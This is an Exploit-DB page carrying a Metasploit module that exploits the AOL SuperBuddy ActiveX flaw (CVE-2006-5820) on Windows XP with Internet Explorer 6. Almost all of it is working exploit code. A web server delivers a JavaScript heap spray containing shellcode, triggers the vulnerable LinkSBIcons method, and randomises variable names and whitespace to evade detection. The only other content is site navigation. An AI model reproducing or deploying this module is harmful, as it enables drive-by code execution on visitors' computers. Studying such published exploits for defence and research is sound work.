AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)

EDB-ID:

3662

CVE:

2006-5820

EDB Verified:

Author:

Krad Chad

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2007-04-04

Vulnerable App: 
require 'msf/core'

module Msf

class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote

	include Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Sb.Superbuddy vulnerability',
			'Description'    => %q{
				This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'kradchad',
					'leetpete'
				],
			'Version'        => '0.1',
			'References'     => 
				[
					[ 'CVE', 'CVE-2006-5820']
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
				],
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end
	
	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Get a unicode friendly version of the return address
		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

		# Randomize the javascript variable names	
		var_buffer    = rand_text_alpha(rand(30)+2)
		var_shellcode = rand_text_alpha(rand(30)+2)
		var_unescape  = rand_text_alpha(rand(30)+2)
		var_x         = rand_text_alpha(rand(30)+2)
		var_i         = rand_text_alpha(rand(30)+2)
		var_tic       = rand_text_alpha(rand(30)+2)
		var_toc       = rand_text_alpha(rand(30)+2)
		
		# Randomize HTML data
		html          = rand_text_alpha(rand(30)+2)
		
		# Build out the message
		content = %Q|
<html>
<head>
	<script>
	try {
	
	var #{var_unescape}  = unescape ;
	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
	
	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;

	var #{var_x} = new Array() ;	
	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
		#{var_x}[ #{var_i} ] = 		
			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
	}
	
	
   	var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );	
	try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }

	
	} catch( e ) { window.location = 'about:blank' ; }
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		# Randomize the whitespace in the document
		content.gsub!(/\s+/) do |s|
			len = rand(100)+2
			set = "\x09\x20\x0d\x0a"
			buf = ''
			
			while (buf.length < len)
				buf << set[rand(set.length)].chr
			end
			
			buf
		end
		
		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
	end

end

end

# milw0rm.com [2007-04-04]
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services